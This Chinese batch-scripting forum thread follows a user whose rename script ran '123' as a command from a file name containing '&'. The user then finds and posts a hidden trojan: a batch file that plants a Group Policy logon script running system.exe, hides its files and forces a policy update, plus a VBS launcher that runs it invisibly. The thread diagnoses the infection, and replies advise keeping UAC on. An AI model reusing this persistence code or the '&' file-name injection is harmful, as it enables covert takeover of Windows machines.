[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
ckz1211

Rank: 1

帖子
积分
19 
技术
0  
捐助
0  
注册时间
2014-2-13 
1 跳转到 » 倒序看帖
打印
tT
发表于 2014-2-14 16:51 | 只看该作者

[系统相关] 问个关于指令123就自动启动组策略更新的BUG

前几天我觉得每次批量改名就要打开有GUI的批量改名程序实在麻烦,就想要弄个鼠标右键菜单里能够一键批量改名的bat脚本

脚本写出来后,特殊字符基本能支持,但据说由于cmd内部的bug,不会把引号内部的&视为转义字符,所以这个符号&无解。然后,我测试&时,用了两个文件
abc & 123.txt
abc&123.txt

然后我就遇到组策略更新的BUG了,一旦启动批量改名的脚本,cmd就会自动更新组策略。然后,我在开始菜单运行gpedit.msc,发现组策略被拒绝访问了!

系统还原后,组策略恢复了,然后我又研究了下这问题——特殊字符&后面的字符,会被错误地视为第二个命令,于是,cmd启动组策略更新的指令竟然是123!
我打开cmd验证下猜想,输入123,然后组策略又被更新了!马上关闭cmd,但之后运行gpedit.msc,发现组策略又被拒绝访问了!
之后我第二次系统还原恢复组策略……

我想问这个关于组策略更新的BUG有办法解决么?(我的系统是Win 7 sp1 64位)
首先,更新组策略这么重要敏感的指令,怎么用个123就能启动了……不小心输错不就危险了?
其次,在不开启UAC的前提下(我真的不能开,开了的话一些破解软件的补丁就无效了),能否禁止cmd命令更新组策略?最好还能禁止cmd对注册表以及其它重要系统设置的改动……
既然cmd对特殊字符&无解,那么一旦文件名里&符号后面有123或者其它能破坏系统的指令,那么我的批量改名脚本就变成危险的病毒了……

PS:现在我在研究powershell,初步看上去这个安全一些……
收藏 分享

Batcher

Rank: 12Rank: 12Rank: 12

帖子
14932 
积分
46139 
技术
857  
捐助
745  
注册时间
2008-6-9 
2
发表于 2014-2-14 17:14 | 只看该作者
能否把你的脚本贴出来看看
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

ckz1211

Rank: 1

帖子
积分
19 
技术
0  
捐助
0  
注册时间
2014-2-13 
3
发表于 2014-2-14 23:59 | 只看该作者
我搜索了一下"123",在系统文件夹C:\Windows下面发现了两个可疑文件
123.bat
  1. @echo off

  2. md %windir%\system32\GroupPolicy\User\Scripts

  3. set di=%windir%\system32\GroupPolicy\User\Scripts

  4. attrib -a -s -r -h %di%\scripts.ini

  5. del %di%\scripts.ini /q

  6. echo.>%di%\scripts.ini

  7. echo [Logon] >>%di%\scripts.ini 

  8. echo 0CmdLine=system.exe >>%di%\scripts.ini 

  9. echo 0Parameters= >>%di%\scripts.ini

  10. attrib +s +a +r +h %di%\scripts.ini

  11. set ei=%windir%\system32\GroupPolicy

  12. attrib -a -s -r -h %ei%\gpt.ini

  13. del %ei%\gpt.ini /q

  14. echo [General]>%ei%\gpt.ini

  15. echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}] >>%ei%\gpt.ini

  16. echo Version=65536 >>%ei%\gpt.ini

  17. attrib +s +a +r +h %ei%\gpt.ini

  18. md %windir%\system32\GroupPolicy\User\Scripts\Logon

  19. md %windir%\system32\GroupPolicy\User\Scripts\Logoff

  20. copy system.exe %di%\Logon /y

  21. gpupdate /force
复制代码
123.vbs
  1. Set ws = CreateObject("Wscript.Shell") 

  2. ws.run "cmd /c 123.bat",vbhide
复制代码
这俩的创建时间2013年9月20日0点19分
妥妥的木马,居然潜伏了这么久!

TOP

PowerShell

Rank: 5Rank: 5

帖子
437 
积分
1319 
技术
27  
捐助
0  
注册时间
2013-6-30 
4
发表于 2014-2-16 00:13 | 只看该作者
1  楼主错误地搞了个文件改名的bat代码 abc & 123.txt ,发现123作为命令运行了。-----带有&符号的改名,却实可用powershell避开。
2 123 运行后,楼主组策略被改了。后来查找发现,有一个123.bat,这是个隐藏的黑客脚本。-----这里告诫大家不要用xp,要用win7以上,这些系统中有uac,cmd中,默认非管理员权限,运行上述黑客脚本,那么黑客脚本中的第一句话,md %windir%\system32\GroupPolicy\User\Scripts,就会拒绝访问。


uac必须开启,才安全,否则,请用虚拟机运行程序。

如果非不听我老人家的话,必然中黑客脚本!!!

必然被脚本黑客玩到死!!!
脚本是写给人看的,是写给用户看的,而不是写给机子看的
用户能看懂、会修改的脚本,才是好脚本。
写易懂的powershell脚本帮人解决问题,进而让用户学会自渔,吾所愿也

TOP

Batcher

Rank: 12Rank: 12Rank: 12

帖子
14932 
积分
46139 
技术
857  
捐助
745  
注册时间
2008-6-9 
5
发表于 2014-2-16 08:28 | 只看该作者
回复 3# ckz1211


    还有倒数第二行那个system.exe
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

返回列表